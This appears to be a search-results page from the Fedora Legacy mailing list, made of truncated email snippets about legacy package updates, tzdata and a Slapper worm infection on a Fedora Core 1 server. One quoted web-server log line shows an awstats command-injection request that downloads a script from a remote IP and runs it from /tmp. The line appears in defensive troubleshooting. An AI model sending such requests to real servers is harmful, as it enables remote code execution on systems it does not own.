David Eisenstein wrote:
As we continue to talk over where Fedora Legacy is going, and what distro's
should or shouldn't be maintained by us, it occurs to me that we are
forgetting some important things
* How many contributors do we have now that get the work of Fedora
kles koe wrote:
why don't you just ask the author of rkhunter to update the hashes
for these packges?
i think i did once and it was fixed within a few days.
I said I already reported this issue twice, but so far I haven't
received any reaction and the latest version of the hashes
Hi Eric,
Quoting Michal Jaegermann [EMAIL PROTECTED]:
I am not sure in which distro /usr/sbin/alternatives showed up
for the first time.
It first showed up in RHL 7.3 as far as RHL goes. It originated in
debian though...
*** ERROR: FEATURE() should be before MAILER()
*** ERROR:
Hi,
I'm just wondering has anyone considered updating the tzdata package for FC1/2?
In Australia for example, our Daylight savings time changed due to the
Commonwealth games. Red Hat have released updates for their distributions, but
looking at FC1/2:
FC1# tzdata-2004b-1.fc1
FC2#
Hi Peter,
On 2006-01-24 08:46:24 +1000, Michael Mansour wrote:
More generally, I read advice somewhere that mounting /tmp with the
noexec option (and making any other temp directories symbolic
links to that one) can make this type of attack much more difficult.
This doesn't really
Hi Mike,
You should do a netstat -na | grep SYN, if you see alot of those then
slapper is there DOS attacking people.
$ netstat -na | grep SYN
$
Thanks for the advice. But, as I am behind a stealth firewall,
I feel relatively secured against *this* type of attack.
Umm, what does
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
SSL server which
Hi James,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Michael Mansour wrote:
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and
then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1
Hi Kelson,
Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1
403 344 - Mozilla/4.0 (compatible
Hi Marc,
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
What version of php
Hi Marc,
On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote:
No I'm not sure. Reading through the link above, it does seem that you've
hit
the nail on the head with this one. I have two other FC1 machines and they
weren't affected by Slapper (even when the 3rd one was). The FC1
Hi David,
Hi John,
Michael Mansour wrote:
The perl versions I'm currently using on FC1 are from that directory:
# rpm -q perl perl-suidperl
perl-5.8.3-18.1.legacy
perl-suidperl-5.8.3-18.1.legacy
I built these versions for FC1; however, they are actually older
Hi John,
Michael Mansour wrote:
The perl versions I'm currently using on FC1 are from that directory:
# rpm -q perl perl-suidperl
perl-5.8.3-18.1.legacy
perl-suidperl-5.8.3-18.1.legacy
I built these versions for FC1; however, they are actually older
than the -17.3.legacy versions
Hi,
I'm trying to apply the latest contrib perl from:
http://www.fedoralegacy.org/contrib/perl/
namely:
perl-5.8.3-19.2.legacy.i386.rpm
perl-suidperl-5.8.3-19.2.legacy.i386.rpm
but I get the following result:
# rpm -Uvh perl-suidperl-5.8.3-19.2.legacy.i386.rpm
perl-5.8.3-19.2.legacy.i386.rpm
Does this affect us?
(1) HIGH: Perl Format String Vulnerability
Affected:
Perl versions 5.9.2 and 5.8.6 confirmed; potentially all Perl versions
Webmin version 1.23 and prior
Description: Perl is widely used as a scripting language for a variety
of applications including
On Wed, 2005-11-09 at 13:27 -0700, Michal Jaegermann wrote:
If I understand correctly that is really an XML_RPC vulnerability in
pear libraries; so if you do not have such capability, or it is not
turned on, then you are not vulnerable. Of course there are some
applications which require
Yes, although technically that's not the mirror, the true mirror is at
http://dl.atrpms.net/mirrors/fedoralegacy/ including yum20 format
headers. I wouldn't start changing content in a mirrored part :=)
The problem is that yum-arch has a bug that breaks my yum20 repos:
Josep L. Guallar-Esteve wrote:
On Wednesday 28 September 2005 11:21, James Kosin wrote:
I'm not knocking RedHat, Fedora or Fedora-Legacy this is a good
point. But, some of us need more than just patches to get us by.
I know, If you really want the latest, why not update to FC4... The
18 matches
Mail list logo
